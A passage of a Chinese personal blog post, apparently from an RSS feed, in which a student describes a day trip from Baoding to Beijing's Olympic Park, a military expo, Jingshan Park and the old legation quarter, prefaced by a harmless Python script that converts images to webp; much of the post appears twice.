    # 检查文件后缀是否为 jpg/jpeg/png
    if any(filename.lower().endswith(ext) for ext in ['.jpg', '.jpeg', '.png']):
    input_file = os.path.join(root, filename)
    output_file = os.path.splitext(input_file)[0] + ".webp"
    # 调用转换函数
    convert_to_webp(input_file, output_file)

    if __name__ == "__main__":
    # 获取当前脚本路径
    folder_path = r"D:\XXX"
    process_folder(folder_path)

    ​为了保证网页浏览速度,我决定将推文图片的 jpg 格式全部转为大小更小 webp 格式[1]

    这是正文

    06:57 京畿之门

    从京畿进京

    ​6 点起床,吃喝拉撒折腾完,打车去保定东,¥11.05。

    07:14 保定东站

    G6712

    ​这还是这个学期第一次坐高铁。

    07:56 北京房山

    这北京看起来也不咋地

    ​看着窗外的风景,列车逐渐离开了保定涿州界,进入了北京房山界。刚进北京境内时,窗外景色跟保定周边并没有什么差别,还是一大片农田。不过从这里开始,居民就享受着与河北居民不同的政策待遇了,保定居民恨死了🤬。

    ​这么看来北京还是有很大面积的土地没有开发的。

    08:13 北京丰台

    下车!

    ​下车!到这里其实路程还没过半。国家会议中心在北京北部鸟巢附近,北京丰台在北京西南郊,还要再倒腾一个多小时地铁,比从保定到北京还慢🫤。

    08:16 京爷吉祥

    Welcome to 保定!

    ​在车站还能看到“这么近,那么美,周末到河北”,我一直觉得这句话听起来怪怪的,有种特意给北京人说的感觉。

    08:43 地铁真挤

    提前感受社畜生活

    ​路线:丰台站——地铁 10 号线站北土城——8 号线奥林匹克公园,¥6。

    ​地铁里人挤人,站到下车也没找到个位置,腿酸死了。看着地铁上的 BOSS 招聘广告,可以看出北京是个很吸引外地人打工的地方,车里人的样貌大都没啥河北人特征。

    ​跟 77 说以后若是来北京上班就要天天享受这样的“福报”😭,77 于是说他不想来北京上班,宁愿回河北。

    09:20 交通网图

    北京城市轨道交通线网图

    ​看一看北京的地铁线路图。密密麻麻,纵横交错。相比于上海的地铁与苏州相连,广州的地铁与佛山相连,杭州的地铁与绍兴和嘉兴相连,北京还要至少再修 10 年才有机会将地铁修到保定!

    09:21 我出站了

    新奥购物中心

    ​出站!开始第一项历程——奥体公园!

    09:23 生命之树

    北京奥林匹克塔

    ​北京奥林匹克塔,曾被称作“生命之树”,位于北京市朝阳区北辰东路 15 号,为中国第六高塔,被网友称为“大钉子”,占地面积约 7000 平方米,始建于 2011 年,于 2015 年 8 月 8 日正式对外开放。

    ​北京奥林匹克塔包括塔基大厅和五个独立的塔冠,塔体由五座 186 米至 246.8 米高的独立塔组合而成,是世界上唯一一个由五个塔独立组成的观光塔,建筑总面积 18687 平方米。其中,塔冠面积 5257 平方米,塔座面积 13430 平方米。塔基大厅为覆土建筑,通过绿坡与地面自然相接。塔冠顶部则有五个独立的观景平台和功能厅[2]

    ​一出站就看到了一座高塔,可惜今天北京今天盛产可爱小雾霾😅。

    09:26 又一高塔

    玲珑塔

    ​“玲珑塔”位于国家体育场“鸟巢”北侧,是 2008 年北京奥运会的电视转播设施,主体采用钢结构,外饰玻璃幕墙,演播塔结构平面形式为等边三角形,共分 7 层,首层为建筑面积 1000 平方米的大厅,2 至 6 层为演播室,顶层塔楼暂定为 VIP 观光厅,整体总高度 132 米。夜幕降临,“玲珑塔”在彩色灯光交替映照下不停变换身姿,秀丽绚烂。奥林匹克多功能演播塔工程位于奥林匹克公园中心区中部,鸟巢北侧,西临中轴景观大道[3]

    ​看着像个电梯。

    09:36 这是鸟巢

    鸟巢

    ​国家体育场,又名“鸟巢”,位于北京奥林匹克公园中心区南部,为 2008 年北京奥运会的主体育场,举行了 2008 年夏季奥运会、残奥会开闭幕式、田径比赛及足球比赛决赛,以及 2022 年冬季奥运会、冬残奥会开闭幕式。

    ​体育场占地 20.4 万平方米,建筑面积 25.8 万平方米,可容纳观众 9.1 万人,其中正式座位 8 万个,临时座位 1.1 万个;由雅克 · 赫尔佐格、德梅隆、艾未未以及李兴钢等设计,由北京城建集团负责施工。体育场的形态如同孕育生命的“巢”和摇篮,寄托着人类对未来的希望。设计者们对这个场馆没有做任何多余的处理,把结构暴露在外,因而自然形成了建筑的外观[4]

    ​到了鸟巢,来跟小迷糊问个好。

    我现在应该离小迷糊挺近的
    一般近
    到鸟巢通勤一小时呢😁

    ​本来还打算在北京跟小迷糊见一面,结果小迷糊说他还拉个兼职周日还要上班……太拼了,太可怕了😱。

    09:38 这是折扇

    国家体育馆

    ​国家体育馆,别名“折扇”“冰之帆”,位于北京市朝阳区天辰东路 9 号,是奥林匹克中心区的标志性建筑之一;2008 年北京奥运会三大主场馆之一;2022 年冬奥会赛事场馆之一。

    ​2005 年 5 月 28 日,国家体育馆开工建设。2007 年 11 月 22 日,完工通过验收,总占地 6.78 公顷,总建筑面积为 80890 平方米。2018 年 8 月,为服务 2022 年冬奥会,国家体育馆初步形成改造方案。同年 12 月 28 日,国家体育馆改造工程开工。2020 年 12 月,国家体育馆改造工程正式完工,总面积约 9.8 万平方米。国家体育馆除开展群众冰雪、青少年冰雪活动外,还将冰雪产业与文化、旅游、科技进行融合[5]

    ​比起鸟巢和水立方,这个场馆似乎没什么名气😇。

    09:39 蓝水立方

    国家游泳中心

    ​国家游泳中心,别名“水立方”、“冰立方”,位于北京市朝阳区北京奥林匹克公园内(北京市朝阳区天辰东路 11 号),始建于 2003 年 12 月 24 日,于 2008 年 1 月正式竣工,2020 年 11 月 27 日,国家游泳中心冬奥会冰壶场馆改造工程通过完工验收,“水立方”变身为“冰立方”。国家游泳中心是 2008 年北京奥运会的精品场馆和 2022 年北京冬奥会的经典改造场馆,也是唯一一座由港澳台同胞、海外华侨华人捐资建设的奥运场馆[6]

    ​这个水立方还可以走进去瞅瞅,于是决定走进去瞅瞅。

    09:42 新年快乐

    欢度春节

    ​只能走到侧面的小商场,大厅进不去,只能隔着窗户看。

    ​大厅门口还摆着新年的龙模型。

    09:46 又见鸟巢

    鸟巢正面

    ​从水立方出来,看到了鸟巢的正面。

    09:54 鸟巢近景

    全是钢筋

    ​上鸟巢一次¥100!我们嫌贵,我们拒绝。远远地看一看。

    09:59 我爱成都

    大熊猫

    ​居然还能在北京看到“我爱成都”的标语。

    09:59 红衣墩墩

    中国龙!

    ​作为一个之前从未见过雪的极南方人,对于冬奥会的印象可能也就这个吉祥物吧。

    10:02 这是五环

    远处是中国考古博物馆

    ​中国考古博物馆是中国历史研究院下设的大型历史考古类博物馆。是我国第一家以考古命名的博物馆。博物馆内展品以考古发掘出土品为主,并包括珍贵古籍、档案文献等。

    ​中国考古博物馆(中国历史文化展示中心)地处北京奥林匹克公园核心区,以考古出土文物和珍贵古籍文献为依托,致力于展示与传播中国优秀传统文化,讲好中华文明源远流长和中华文化辉煌灿烂的中国故事,打造北京城市中轴线上的历史文化客厅和展示中华文明的国家窗口。正在努力成为北京城市中轴线上的历史文化客厅、新时代对外讲好中国故事的国家形象馆。2023 年 9 月 15 日,中国考古博物馆正式面向社会公众开放[7]

    ​希望在毕业前能有一段空闲时间,能够逛逛北京的各大国系博物馆开开眼界,然后就再也不来北方了😵。

    10:04 奥运圣火

    火炬

    ​看着这个火炬让我想起了小时候看奥运会开幕会的场景,现在已经好久没关注各色体育赛事了。

    10:32 会议中心

    看着不是很大

    ​国家会议中心位于鸟巢和水立方之北,是一座八层楼、近 400 米的长形建筑。2008 年奥运会期间,由击剑馆、国际广播中心组成。
    ​主新闻中心(MPC)是文字记者和摄影记者进驻的工作区,共有 1000 多个记者工作席位及硬件配套设施。国际广播中心建筑面积 14 万平方米,是奥运会历史上最大的国际广播中心,来自全世界 16000 名广播记者都在此工作。
    ​奥运之后,国家会议中心经过一年多的改造投入经营,已走过七年历程,创造了无数辉煌,这座曾经的奥运场馆正以骄人的成绩,成为中国乃至亚洲快速成长的会展业第一品牌。大量具有国际影响力的会议、展览项目陆续在国家会议中心成功举办,让这个中国会议业的旗舰场馆向世界展示了其多平台、复合型、高质量的强大综合实力,创造出了良好的经济效益和社会效益[8]

    ​这个国家会议中心看着并不是很大,还没有海峡国际会展中心大呢。

    10:43 没啥意思

    军博会 军博会 军博会 军博会
    不得劲

    ​参观军博会之前,77 还蛮激动的,说能看到战斗机坦克之类的,而我觉得会不会安检很严,会不会有不让拍照等严苛规则。

    ​结果参观了一阵感觉没啥意思啊,就是一些公司展示它们的研发产品,看着也不是很吸引人。

    控制室解决方案

    ​我觉得这个控制室解决方案仅仅是用 Unity 之类的软件写了个前端,那我也会,没啥内涵🥴。

    ​还能看到语音助手,AI 绘画之类的东西,我觉得也都是套壳,没啥所谓真正的技术。

    ​最后简单逛一逛就出来了。

    11:29 共享单车

    租房广告

    ​77 提议去吃个老北京铜锅涮肉,于是决定骑共享单车过去。不愧是北京啊连共享单车骑起来都比保定的舒服。

    ​车架前面还有个租房小传单。¥1200 / 月的《精装单间》估计是一套大房子被拆成好多间分开租,多个租户公用一个卫生间。一张床一个厕所的《主卧独卫》就要¥3400 / 月,绝😅。

    11:53 铜锅涮肉

    清真!

    ​看导航各种迷路,最后骑到了一个社区里才找到了店家。3 个人点了个 3-4 人餐,¥295。小贵但也还能接受。最后没有吃完剩了点蔬菜。

    12:00 这是糖蒜

    糖蒜

    ​我从未见过此种食物。77 说这在北方蛮常见的可以尝尝。吃起来酸酸甜甜的,但我想到这个是蒜就没怎么想吃🤧。

    12:57 朝阳社区

    有点像河南新村

    ​吃完饭,77 提议走去护国寺小吃整点老北京某臭名昭著饮料,出发!

    ​感觉进了北京的老社区,这里面住的应该都是老北京了,住宅上的牌子都有点年代感了🥴。

    12:59 北京老房

    北京老房子

    ​凡哥说这房子看上去还不如他家呢,但估计我们倾家荡产也买不起这里的房。

    13:05 奇特建筑

    奇特建筑 奇特建筑 奇特建筑
    老北京麦当劳

    ​北京居然还有唐人街……以及北京著名小吃——老北京麦当劳🤩!

    13:10 美味豆汁

    护国寺小吃

    ​到了 77 最想去的护国寺小吃店了。77 要在这里买瓶豆汁。一开始他还想买多点宿舍一人一瓶,被我拦住了🤪。

    喜提特产

    ​最后还是 77 买了两瓶带回去给舍友尝尝鲜。2 瓶豆汁¥16,看原料只有水和绿豆,无任何添加剂,非常绿色健康啊!

    13:12 民族博院

    北京中华民族博物院 北京中华民族博物院 北京中华民族博物院
    北京中华民族博物院

    ​来到了中华民族博物院门口,进一次要¥60。看上去还蛮有特色的,但我觉得还是要带从未去过北京的凡哥逛逛景山公园比较好,遂决定下次一定,在这直接打车去景山公园。

    小小榕王,可笑可笑

    ​北京这个地方居然还能种榕树,这么小一棵榕树也被称之为榕王😅!

    13:15 图腾柱子

    感觉有点东南亚风格

    ​在柱子下等车中,不愧是北京连打车都很贵,¥29.48。

    13:46 车上抓拍

    鼓楼 什刹海 南锣鼓巷 北大红楼
    就要到了!

    ​在车上抓拍一下鼓楼、什刹海、南锣鼓巷和北大红楼。

    ​越靠近景山,越堵车。最后到景山前街路口前,司机说里面太堵了不想开了把我们轰下来了😅。

    14:17 大神武门

    景山脚下

    ​成功到达故宫博物院北口。由于故宫门票太难约了,只好跟凡哥说下次一定。上个景山凑合一下,¥2。

    14:17 景山公园

    开爬!

    ​山顶上有好看的哦!

    14:25 我要上山

    富览亭

    ​富览亭。西侧第一座亭。孔雀蓝琉璃筒瓦顶,紫晶色琉璃瓦剪边,重檐圆攒尖顶。

    辑芳亭

    ​辑芳亭。西侧第二座亭。翡翠绿琉璃筒瓦顶,黄琉璃筒瓦剪边,重檐八角攒尖式。上檐重昂七踩斗拱,下檐单昂五踩斗拱,内原供五方佛之一的阿弥陀佛,为铸铜镏金佛像,被八国联军劫去。

    ​我决定按照四年前的浏览线路再走一遍。

    14:27 北面望远

    北海公园 什刹海
    北海的菊花没有开

    ​到半山腰了。看一看北海公园和什刹海。前面的不知道是什么楼看上去没有人,不给开放。

    14:30 我登顶了

    万春亭

    ​万春亭。位于景山的中峰,中峰的相对高度为 45.7 米,是北京城南北中轴线上最高和最佳的观景点[9]

    ​这个亭子居然不让进了,“北京城南北中轴线上最高和最佳的观景点”无了。

    北面人少

    南面人多

    是谁 用时光 筑造了你的梦幻

    是谁 用尘埃 模糊了你的容颜

    望一回宫阙亭台

    尽收眼底那如画的江山

    听一番晨钟暮鼓

    用心慨叹那朝代的轮转

    王侯已成背影

    有谁还在看着云起云落的变迁[10]

    国贸 CBD

    ​被可爱小雾霾淹没的中国尊与大裤衩。

    王府井

    ​还是能记得出那个钟楼是王府井。

    14:42 我要下山

    观妙亭

    ​观妙亭。东侧第二座亭。翡翠绿琉璃筒瓦顶,黄琉璃筒瓦剪边,重檐八角攒尖式。观妙亭内原供奉五方佛之一的阿閦佛,为铸铜镏金佛像,清光绪二十六年(1900 年)被八国联军劫去。

    周赏亭

    ​周赏亭。东侧第一座亭。孔雀蓝琉璃筒瓦顶,紫晶色琉璃瓦剪边,重檐圆攒尖顶。

    14:56 歪脖子树

    崇祯 GG place

    ​景山公园另一人文景观是崇祯自缢处。景山东麓,原有一株向东倾斜的低矮老槐树,这是明崇祯朱由检自缢的地方。明末,李自成起义军于 1644 年 3 月攻入北京,崇祯 3 月 19 日逃到景山,自觉有愧于祖先基业,以腰带自尽于观妙亭下的歪脖槐树之上。十年动乱期间,老槐树被当作“四旧”砍掉,1981 年在原址新移栽了一棵古槐。1996 年,公园管理处将东城区建国门内北顺城街 7 号门前一株有一百五十多年树龄的古槐移植至老槐树原处,替代了 1981 年新移植的小槐树。

    ​接下来是我最推荐的景点——崇祯皇帝上吊处!可惜这里的树和石碑都是后来重建的。解放后北京仍有不少有历史气息的东西被毁,令人惋惜😵。

    15:16 北京市花

    月季

    ​山脚下的月季。

    15:32 我要出去

    紫禁城角楼

    ​接下来计划去天安门。这一片地方交通不太好,没得地铁和共享单车,公交车只有观光车可以坐,¥50。我们嫌贵,我们拒绝。

    ​记得四年前也是这样的情况,当时为了找地铁站强行过北海公园。而 77 去过北海公园了,那就算了,遂决定从东边绕开故宫去天安门🥳。

    15:43 池子大街

    北池子大街 南池子大街
    池子大街

    ​故宫进不去,只得东边绕开故宫,还走了好久,皇帝的房子还是大。

    ​我觉得住在这里的居民并不一定舒服,一天到到晚周围都是闹哄哄的😖,这边离地铁站也不近。

    ​还有平价商店好评!一瓶农夫山泉¥2。

    ​期间凡哥去找了个共享单车找同学去了,剩下我跟 77。

    16:04 长安大街

    长安大道连狭斜

    ​进入东长安街,还得刷身份证,搞得紧张兮兮庄严肃穆。

    中国国家博物馆

    ​希望有一天能够约上。

    没预约!寄!

    ​印象中四年前是不需要预约就能进天安门广场的(或许也要,印象不深了),就没考虑过预约问题,于是就进不去了。

    ​离回去还早,跟 77 商量了下,好像周围的地方我俩都玩过了。最后我看了看小红书,决定坐地铁去一下东交民巷,1 号线天安门东——东单,¥3。

    ​地铁太挤了地铁太挤了地铁太挤了地铁太挤了地铁太挤了地铁太挤了😠!

    16:35 同仁医院

    著名医院

    ​印象中是个很牛逼的医院。

    16:43 东交民巷

    ​东交民巷,位于北京市东城区,建造于中国 13 世纪的元朝鼎盛时期。胡同全长 1.6 千米,从天安门广场的东路一直延伸到崇文门内大街,是老北京胡同中最长的一条。早在元大都时期,这里就是运送粮食的重要小巷,因此称之为“江米巷”。
    ​东交民巷是一个集使馆、教堂、银行、俱乐部为一体的欧式风格街区。现存建筑有法国使馆,奥匈使馆。比利时使馆、日本公使馆和使馆、意大利使馆、英国使馆等。现存建筑均保留原状,保持 20 世纪初欧美流行的折中主义风格,用清水砖砌出线脚和壁柱,采用砖拱券加外廊,木结构角檩架,铁皮坡顶。东交民巷使馆建筑群是北京仅存的 20 世纪初的西洋风格建筑群[11]

    ​这条巷子曾是签订辛丑条约的地方……使馆区离故宫这么近,大清是怎么敢一次宣战这么多国的。

    16:43 哥特教堂

    圣弥额尔天主堂 圣弥额尔天主堂 圣弥额尔天主堂
    圣弥额尔天主堂

    ​圣米厄尔教堂,又称东交民巷天主堂,位于北京市东城区东交民巷甲 13 号,是北京城区最小的天主教堂,为法国高嘉理神父创建,始建于清光绪二十七年(1901 年)。
    ​圣米厄尔教堂为哥特式风格,占地面积 2656.4 平方米,清水砖墙,内部为木结构,立面为三个尖顶钟楼,用尖券、壁柱、玫瑰窗和壁龛装饰,主体建筑为高二层,坐北朝南,东西面阔三开间,南北进深十四开间。圣米厄尔教堂正门上方为教堂主保天使圣米厄尔(大天使米迦勒)的雕像。圣米厄尔教堂造型上别具特色,是西方传教士在北京修建的最后一座天主教堂,对研究清代的天主教建筑有重要研究价值[12]

    ​基本上,都不对外开放,简单拍照打卡下。

    ​在这里找到了共享单车!好耶😍!

    16:52 使馆旧址

    比利时使馆旧址 比利时使馆旧址
    比利时使馆旧址

    ​比利时使馆旧址,位于北京市东城区崇文门西大街 9 号,始建于清光绪年间,现为紫金宾馆。

    ​比利时使馆旧址现存五栋建筑,主楼为英国都铎式风格,地上三层,地下一层,立面用砖作出三个城堡和雉碟组成的山花。四栋配楼对称布置,为乡村别墅式。比利时使馆旧址是帝国主义推行对华侵略的大本营之一,是带有屈辱印记的半封建半殖民地时期的建筑,它时刻提醒着人们要牢记历史的教训,同时也为历史研究提供了重要的实物资料[13]

    ​比利时使馆旧址。

    法国使馆旧址

    ​法国使馆旧址,位于北京市东城区东交民巷 15 号,原为纯公府,清咸丰十一年(1861 年)改建为法国使馆。

    ​法国使馆旧址现存中央喷水池、大门和 4 栋配楼,大门用砖做出壁柱和拱券。4 栋配楼对称排列,为法国乡村别墅式,木构两层,有木外廊,也有砖做连续券廊。法国使馆旧址是在纯公府的中式建筑基础上修茸而成的,在很大程度上保持了中式形制和体量,为研究清晚期的使馆与王府的结合建筑提供了实物参考[14]

    ​法国使馆旧址,被围墙包得严严实实。大门是军区,不敢拍。

    16:53 邮局旧址

    法国邮政局旧址

    ​法国邮政局旧址,位于北京市东城区东交民巷 19 号,清光绪二十七年(1901 年)改建为法国邮政局。
    ​法国邮政局旧址建筑主体为砖木结构,坐北朝南,四方造型,总体为单层建筑,高约 6 米,东西侧面宽约 13 米。法国邮政局旧址作为列强在京城修建最早的一批近代领事馆区建筑,在中式建筑框架下融入了诸多西方建筑特点的折中主义风格,对研究领事馆区的建筑特点提供了实物参考[15]

    ​法国邮政局旧址。

    16:55 正金银行

    中国法院博物馆

    ​正金银行旧址,位于北京市东城区正义路 4 号,始建于清宣统二年(1910 年),原为日本横滨正金银行北京支行,现为中国法院博物馆。

    ​正金银行旧址主体建筑地上两层,地下一层,西洋古典风格,砖石立面。内为木结构,用花岗石做台基、壁柱、隅石、窗套和壁龛,转角中心设三层铁皮穹顶楼,作工套和壁龛,转角中心设三层铁皮穹顶楼。正金银行旧址是日本帝国主义对中国进行经济侵略的重要实证,有较高的历史价值[16]

    ​中国法院博物馆,亦是日本正金银行旧址。

    ​再前面有保安堵路说交通管制不让骑……

    17:08 西长安街

    ​77 提议骑共享单车去西单解决一下晚饭问题。有了共享单车就可以骑过西长安街经过天安门了!于是开冲🥳!

    我爱北京天安门,天安门上太阳升!

    ​天安门周围全是安保,盯着我们不让停车下来拍照,只好慢慢骑过去抓拍。

    伟大领袖毛主席,指引我们向前进!

    ​抓拍人民大会堂和人民英雄纪念碑。

    ​然后又骑到了新华门,不敢拍🫢。其实是允许拍摄的。

    17:12 国家剧院

    中国国家大剧院

    ​中国国家大剧院,是新“北京十六景”之一的地标性建筑,位于北京市中心天安门广场西,人民大会堂西侧,由主体建筑及南北两侧的水下长廊、地下停车场、人工湖、绿地组成。
    ​中国国家大剧院由法国建筑师保罗·安德鲁主持设计,国家大剧院外观呈半椭球形,东西方向长轴长度为 212.20 米,南北方向短轴长度为 143.64 米,建筑物高度为 46.285 米,占地 11.89 万平方米,总建筑面积约 16.5 万平方米,其中主体建筑 10.5 万平方米,地下附属设施 6 万平方米,总造价 30.67 亿元。设有歌剧院、音乐厅、戏剧场以及艺术展厅、餐厅、音像商店等配套设施[17]

    ​国家大剧院。看上去就一蛋🤨……

    17:30 沙县小吃

    沙县国际大酒楼

    ​终于骑到了西单。看一看西单里的沙县国际大酒楼,价格感人😅……

    17:54 南昌罐汤

    鸡蛋肉饼汤

    ​在西单大悦城解决晚饭问题。由于我中午吃得太好导致晚上都不怎么想吃东西,于是就要了一碗瓦罐汤,¥10。77 要了一碗赣面¥19,他说这玩意太辣了😶‍🌫️,我这个福建人是怎么推荐这玩意的。

    18:43 安河桥北

    让我再看你一眼 从南到北

    ​北京之行就要结束了!乘地铁 4 号线西单——北京西站,¥3。

    ​地铁出来进北京西站免安检,还挺令我意外,印象中铁路的安检级别是比地铁要高的🤔。

    20:29 人真是多

    候车室

    ​啊,河北保定,我又要回来了😭!

    ​最后还是有惊无险地赶在 22:30 前到宿舍,洗上了澡。

    ​然后就是品尝豆汁时间!一股酸酸臭臭的口感,得到了宿舍的一致差评!什么玩意!真不是给人喝的😅!

    参考文献


    1. Python 把图片转换为 webp (xpdbk.com) ↩︎

    2. 北京奥林匹克塔_百度百科 (baidu.com) ↩︎

    3. 北京奥运会玲珑塔_百度百科 (baidu.com) ↩︎

    4. 国家体育场_百度百科 (baidu.com) ↩︎

    5. 国家体育馆(北京大型体育运动场馆)_百度百科 (baidu.com) ↩︎

    6. 国家游泳中心_百度百科 (baidu.com) ↩︎

    7. 中国考古博物馆_百度百科 (baidu.com) ↩︎

    8. 国家会议中心_百度百科 (baidu.com) ↩︎

    9. 景山公园(中国 4A 级旅游景区)_百度百科 (baidu.com) ↩︎

    10. 大故宫(阎崇年系列节目《大故宫》同名主题曲)_百度百科 (baidu.com) ↩︎

    11. 东交民巷(北京市文物保护街区)_百度百科 (baidu.com) ↩︎

    12. 圣米厄尔教堂_百度百科 (baidu.com) ↩︎

    13. 比利时使馆旧址_百度百科 (baidu.com) ↩︎

    14. 法国使馆旧址_百度百科 (baidu.com) ↩︎

    15. 法国邮政局旧址_百度百科 (baidu.com) ↩︎

    16. 正金银行旧址(北京市第五批全国重点文物保护单位)_百度百科 (baidu.com) ↩︎

    17. 中国国家大剧院_百度百科 (baidu.com) ↩︎

    ]]>
    + 这是前言军博会!
    凡哥😍go to peking 吗
    去看这个
    走!

    ​凡哥从未去过北京,他一直嚷嚷着有机会可以一去。刚好在小红书上看到了军博会的消息,于是就怂恿凡哥周末 5.19 勇闯北京!


    ​宿舍 3 人购买车票:

    • G6712 ¥48

      • 07:12 保定东
      • 07:38 高碑店东
      • 07:49 涿州东
      • 08:14 北京丰台
    • G6731 ¥57

      • 20:57 北京西
      • 21:39 保定东

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    import os  # 处理文件和目录
    import sys # 获取命令行参数
    from PIL import Image # 处理图片

    def convert_to_webp(input_file, output_file, quality=80):
    # 函数用于转换一个图片文件
    # input_file: 输入的图片文件路径
    # output_file: 输出的 webp 文件路径
    # quality: webp 文件质量,取值范围 1-100,默认值 80
    try:
    # 打开输入图片文件
    with Image.open(input_file) as im:
    # 保存为 webp 格式
    im.save(output_file, "webp", quality=quality)
    print(f"Converted: {input_file} => {output_file}")
    except Exception as e:
    # 捕获异常
    print(f"Error converting file: {input_file}")
    print(str(e))

    def process_folder(folder_path):
    # 函数用于处理整个文件夹
    # folder_path: 文件夹路径
    for root, dirs, files in os.walk(folder_path):
    for filename in files:
    # 检查文件后缀是否为 jpg/jpeg/png
    if any(filename.lower().endswith(ext) for ext in ['.jpg', '.jpeg', '.png']):
    input_file = os.path.join(root, filename)
    output_file = os.path.splitext(input_file)[0] + ".webp"
    # 调用转换函数
    convert_to_webp(input_file, output_file)

    if __name__ == "__main__":
    # 获取当前脚本路径
    folder_path = r"D:\XXX"
    process_folder(folder_path)

    ​为了保证网页浏览速度,我决定将推文图片的 jpg 格式全部转为大小更小 webp 格式[1]

    这是正文

    06:57 京畿之门

    从京畿进京

    ​6 点起床,吃喝拉撒折腾完,打车去保定东,¥11.05。

    07:14 保定东站

    G6712

    ​这还是这个学期第一次坐高铁。

    07:56 北京房山

    这北京看起来也不咋地

    ​看着窗外的风景,列车逐渐离开了保定涿州界,进入了北京房山界。刚进北京境内时,窗外景色跟保定周边并没有什么差别,还是一大片农田。不过从这里开始,居民就享受着与河北居民不同的政策待遇了,保定居民恨死了🤬。

    ​这么看来北京还是有很大面积的土地没有开发的。

    08:13 北京丰台

    下车!

    ​下车!到这里其实路程还没过半。国家会议中心在北京北部鸟巢附近,北京丰台在北京西南郊,还要再倒腾一个多小时地铁,比从保定到北京还慢🫤。

    08:16 京爷吉祥

    Welcome to 保定!

    ​在车站还能看到“这么近,那么美,周末到河北”,我一直觉得这句话听起来怪怪的,有种特意给北京人说的感觉。

    08:43 地铁真挤

    提前感受社畜生活

    ​路线:丰台站——地铁 10 号线站北土城——8 号线奥林匹克公园,¥6。

    ​地铁里人挤人,站到下车也没找到个位置,腿酸死了。看着地铁上的 BOSS 招聘广告,可以看出北京是个很吸引外地人打工的地方,车里人的样貌大都没啥河北人特征。

    ​跟 77 说以后若是来北京上班就要天天享受这样的“福报”😭,77 于是说他不想来北京上班,宁愿回河北。

    09:20 交通网图

    北京城市轨道交通线网图

    ​看一看北京的地铁线路图。密密麻麻,纵横交错。相比于上海的地铁与苏州相连,广州的地铁与佛山相连,杭州的地铁与绍兴和嘉兴相连,北京还要至少再修 10 年才有机会将地铁修到保定!

    09:21 我出站了

    新奥购物中心

    ​出站!开始第一项历程——奥体公园!

    09:23 生命之树

    北京奥林匹克塔

    ​北京奥林匹克塔,曾被称作“生命之树”,位于北京市朝阳区北辰东路 15 号,为中国第六高塔,被网友称为“大钉子”,占地面积约 7000 平方米,始建于 2011 年,于 2015 年 8 月 8 日正式对外开放。

    ​北京奥林匹克塔包括塔基大厅和五个独立的塔冠,塔体由五座 186 米至 246.8 米高的独立塔组合而成,是世界上唯一一个由五个塔独立组成的观光塔,建筑总面积 18687 平方米。其中,塔冠面积 5257 平方米,塔座面积 13430 平方米。塔基大厅为覆土建筑,通过绿坡与地面自然相接。塔冠顶部则有五个独立的观景平台和功能厅[2]

    ​一出站就看到了一座高塔,可惜今天北京今天盛产可爱小雾霾😅。

    09:26 又一高塔

    玲珑塔

    ​“玲珑塔”位于国家体育场“鸟巢”北侧,是 2008 年北京奥运会的电视转播设施,主体采用钢结构,外饰玻璃幕墙,演播塔结构平面形式为等边三角形,共分 7 层,首层为建筑面积 1000 平方米的大厅,2 至 6 层为演播室,顶层塔楼暂定为 VIP 观光厅,整体总高度 132 米。夜幕降临,“玲珑塔”在彩色灯光交替映照下不停变换身姿,秀丽绚烂。奥林匹克多功能演播塔工程位于奥林匹克公园中心区中部,鸟巢北侧,西临中轴景观大道[3]

    ​看着像个电梯。

    09:36 这是鸟巢

    鸟巢

    ​国家体育场,又名“鸟巢”,位于北京奥林匹克公园中心区南部,为 2008 年北京奥运会的主体育场,举行了 2008 年夏季奥运会、残奥会开闭幕式、田径比赛及足球比赛决赛,以及 2022 年冬季奥运会、冬残奥会开闭幕式。

    ​体育场占地 20.4 万平方米,建筑面积 25.8 万平方米,可容纳观众 9.1 万人,其中正式座位 8 万个,临时座位 1.1 万个;由雅克 · 赫尔佐格、德梅隆、艾未未以及李兴钢等设计,由北京城建集团负责施工。体育场的形态如同孕育生命的“巢”和摇篮,寄托着人类对未来的希望。设计者们对这个场馆没有做任何多余的处理,把结构暴露在外,因而自然形成了建筑的外观[4]

    ​到了鸟巢,来跟小迷糊问个好。

    我现在应该离小迷糊挺近的
    一般近
    到鸟巢通勤一小时呢😁

    ​本来还打算在北京跟小迷糊见一面,结果小迷糊说他还拉个兼职周日还要上班……太拼了,太可怕了😱。

    09:38 这是折扇

    国家体育馆

    ​国家体育馆,别名“折扇”“冰之帆”,位于北京市朝阳区天辰东路 9 号,是奥林匹克中心区的标志性建筑之一;2008 年北京奥运会三大主场馆之一;2022 年冬奥会赛事场馆之一。

    ​2005 年 5 月 28 日,国家体育馆开工建设。2007 年 11 月 22 日,完工通过验收,总占地 6.78 公顷,总建筑面积为 80890 平方米。2018 年 8 月,为服务 2022 年冬奥会,国家体育馆初步形成改造方案。同年 12 月 28 日,国家体育馆改造工程开工。2020 年 12 月,国家体育馆改造工程正式完工,总面积约 9.8 万平方米。国家体育馆除开展群众冰雪、青少年冰雪活动外,还将冰雪产业与文化、旅游、科技进行融合[5]

    ​比起鸟巢和水立方,这个场馆似乎没什么名气😇。

    09:39 蓝水立方

    国家游泳中心

    ​国家游泳中心,别名“水立方”、“冰立方”,位于北京市朝阳区北京奥林匹克公园内(北京市朝阳区天辰东路 11 号),始建于 2003 年 12 月 24 日,于 2008 年 1 月正式竣工,2020 年 11 月 27 日,国家游泳中心冬奥会冰壶场馆改造工程通过完工验收,“水立方”变身为“冰立方”。国家游泳中心是 2008 年北京奥运会的精品场馆和 2022 年北京冬奥会的经典改造场馆,也是唯一一座由港澳台同胞、海外华侨华人捐资建设的奥运场馆[6]

    ​这个水立方还可以走进去瞅瞅,于是决定走进去瞅瞅。

    09:42 新年快乐

    欢度春节

    ​只能走到侧面的小商场,大厅进不去,只能隔着窗户看。

    ​大厅门口还摆着新年的龙模型。

    09:46 又见鸟巢

    鸟巢正面

    ​从水立方出来,看到了鸟巢的正面。

    09:54 鸟巢近景

    全是钢筋

    ​上鸟巢一次¥100!我们嫌贵,我们拒绝。远远地看一看。

    09:59 我爱成都

    大熊猫

    ​居然还能在北京看到“我爱成都”的标语。

    09:59 红衣墩墩

    中国龙!

    ​作为一个之前从未见过雪的极南方人,对于冬奥会的印象可能也就这个吉祥物吧。

    10:02 这是五环

    远处是中国考古博物馆

    ​中国考古博物馆是中国历史研究院下设的大型历史考古类博物馆。是我国第一家以考古命名的博物馆。博物馆内展品以考古发掘出土品为主,并包括珍贵古籍、档案文献等。

